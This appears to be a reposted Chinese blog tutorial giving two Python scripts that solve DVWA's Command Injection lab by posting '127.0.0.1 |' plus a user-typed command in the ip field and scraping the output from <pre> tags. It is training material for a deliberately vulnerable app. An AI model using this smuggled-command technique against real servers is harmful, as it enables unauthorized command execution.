IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Python知识库 -> dvwa——Command Injection初级、中级和高级python脚本解法(二)和(三) -> 正文阅读

[Python知识库]dvwa——Command Injection初级、中级和高级python脚本解法(二)和(三)

输入127.0.0.1命令,查看DVWA的command execute页面的源代码,如下图所示:

?通过查询得知pre是唯一的,因此需要将返回页面中的pre标签提取出来,本篇主要讲解在解法一的基础上使用re模块正则网页内容,爬取网页数据,达到通过目的。

python爬虫——request模块(一)_xiaofengdada的博客-CSDN博客_python request

python——正则表达式(一)_xiaofengdada的博客-CSDN博客

python——re模块9个常量举例详细讲解_xiaofengdada的博客-CSDN博客

解法(二)

import re
import requests
cmd = input("请输入您要执行的命令行:").strip()
try:
    cmd = cmd.lower()
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
        'Cookie': 'security=medium; PHPSESSID=9fvvn8hc6iq55cs3vgbpahvoj0'
    }
    url = "http://x.x.x.x/dvwa/vulnerabilities/exec/#"
    data = {
        'ip': '127.0.0.1 |{}'.format(cmd),
        'Submit': 'Submit'
        }
    res = requests.post(url=url,headers=header,data=data)
    #print(res.status_code)
    #text1 = re.compile(r'(?<=<pre>).*?(?=</pre)',re.M|re.S)
    text1 = r'<pre>(.*?)</pre>'
    last = re.findall(text1,res.text,re.DOTALL)
    for consult in last:
        print(consult)
except Exception as e:
    print("您的输入错误")

输出结果:

?

?解法(三)

import re
import requests
cmd = input("请输入您要执行的命令行:").strip()
try:
    cmd = cmd.lower()
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
        'Cookie': 'security=medium; PHPSESSID=9fvvn8hc6iq55cs3vgbpahvoj0'
    }
    url = "http://x.x.x.x/dvwa/vulnerabilities/exec/#"
    data = {
        'ip': '127.0.0.1 |{}'.format(cmd),
        'Submit': 'Submit'
        }
    res = requests.post(url=url,headers=header,data=data)
    #print(res.status_code)
    text1 = re.compile(r'(?<=<pre>).*?(?=</pre)',re.M|re.S)
    last = re.search(text1,res.text)
    print(last.group())

except Exception as e:
    print("您的输入错误")

输出结果:

初级和高级的只要把请求头里面的security设置为low和high即可!?

  Python知识库 最新文章
Python中String模块
【Python】 14-CVS文件操作
python的panda库读写文件
使用Nordic的nrf52840实现蓝牙DFU过程
【Python学习记录】numpy数组用法整理
Python学习笔记
python字符串和列表
python如何从txt文件中解析出有效的数据
Python编程从入门到实践自学/3.1-3.2
python变量
上一篇文章      下一篇文章      查看所有文章
加:2022-01-24 10:47:36  更:2022-01-24 10:48:09 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 1:22:59-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码